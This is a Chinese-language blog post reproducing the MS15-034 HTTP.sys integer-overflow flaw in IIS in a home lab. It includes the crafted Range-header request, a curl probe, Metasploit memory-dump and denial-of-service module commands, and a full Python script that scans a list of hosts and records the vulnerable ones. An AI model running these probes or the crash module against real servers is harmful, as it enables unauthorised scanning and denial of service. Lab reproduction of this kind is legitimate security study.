水水水~继续水博客
前言
本文是针对MS15-034的复现。emmm,准备工作,先看看这个漏洞的介绍和危害。这是位于HTTP.SYS中的整数溢出漏洞。UlpParseRange处发生了整数溢出,而在此处导致了安全检查的绕过HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
漏洞搭建
这里漏洞搭建看网上好多博客没有写具体的,可能比较简单吧,那就不写了,可以看这个来进行搭建:https://jingyan.baidu.com/article/19192ad853224ce53f570748.html
我是用win7进行搭建。
win7: 192.168.137.141
kali: 192.168.137.129
漏洞复现
以下几种检测方法
第一种
f12抓包查看发现是IIS7.5
、
还有查看到Accept-Ranges为bytes(解释:断点续传)
然后可以构造数据包,像这样GET / HTTP/1.1 Host: stuff Range: bytes=0-18446744073709551615发送给IIS服务器看回显就可以知道是否存在此漏洞。
返回416状态码则存在此漏洞,返回400则不存在。第二种
使用curl命令curl http://192.168.137.141 -H "Host: 192.168.137.141" -H "Range: bytes=0-18446744073709551615"
存在此漏洞。第三种
metasploit的scan模块进行查看。auxiliary/scanner/http/ms15_034_http_sys_memory_dump
然后同样使用metasploit下的dos模块进行攻击auxiliary/dos/http/ms15_034_ulonglongadd
设置set rhosts 192.168.137.141 run即可进行攻击。
还有脚本POC#!/usr/bin/env python import requests """ @Zigoo0 Another testing methods. curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-18446744073709551615" wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/ """ # Coloring class class colors: def __init__(self): self.green = "\033[92m" self.blue = "\033[94m" self.bold = "\033[1m" self.yellow = "\033[93m" self.red = "\033[91m" self.end = "\033[0m" color = colors() banner = color.green+''' This is a test POC for: MS15-034: HTTP.sys (IIS) DoS And Possible Remote Code Execution. By Ebrahim Hegazy @Zigoo0 \n'''+color.end print banner #Reading hosts from a text file to test multiple sites. hosts = open(raw_input('[*] Enter the name of the list file: ')).readlines() #Vulnerable hosts will go here. vulnerable = set() #Fixed hosts will go here. fixed = set() #Defining the main function. def main(url): print color.green+"[*] Testing "+color.end + url try: #Defining the Headers. headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0", "Accept-Encoding": "gzip, deflate", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Range": "bytes=0-18446744073709551615", "Referer": "https://github.com/zigoo0/", "Connection": "keep-alive" } #Sending the Request. r = requests.get(url, headers=headers, verify=False, timeout=5) if r.status_code == 416 or "Requested Range Not Satisfiable" in r.text: #print r.status_code. print "[*] %s"%(url) + color.red+" is Vulnerable!\n"+color.end #Adding the vulnerable hosts to a SET for later use and to make sure it's a unique host. vulnerable.add(url) else: #print r.status_code print "[*] Seems %s "%(url) + color.green+" is not vulnerable!\n"+color.end #Adding the non-vulnerable hosts to a SET for later use. fixed.add(url) except Exception: pass if __name__ == "__main__": for host in hosts: url = host.strip() main(url) #Printing the list of vulnerable sites. print color.red+"[*] %s found to be vulnerable."%(len(vulnerable)) +color.end for vuln in vulnerable: print "[-] ", vuln #Adding the vulnerable sites to a text file. vulnz = open('vulnerable-hosts.txt', 'a') vulnz.write(vuln+"\n") print color.blue+"[*] Vulnerable hosts added to "+color.end + "vulnerable-hosts.txt" #Printing the number of fixed/not-vulnerable hosts. print color.green+"\n[*] %s found to be NOT vulnerable."%(len(fixed)) +color.end #printing the refferences. print color.green+"\n[*] Please follow below link for more details about this vulnerabability and How to FIX it."+color.end print "[*] https://technet.microsoft.com/library/security/ms15-034" print "[*] https://technet.microsoft.com/en-us/library/security/ms15-apr.aspx" print color.green+"[*] Don't forget to update your servers.\n"+color.end参考链接:
POC地址:https://github.com/zigoo0/MS15-034
参考博客:https://www.cnblogs.com/peterpan0707007/p/8529261.html
- 本文链接:https://m0re.top/posts/9824b867/
- 版权声明:本博客所有文章除特别声明外,均默认采用 许可协议。
您可以点击下方按钮切换对应评论系统,
Valineutterances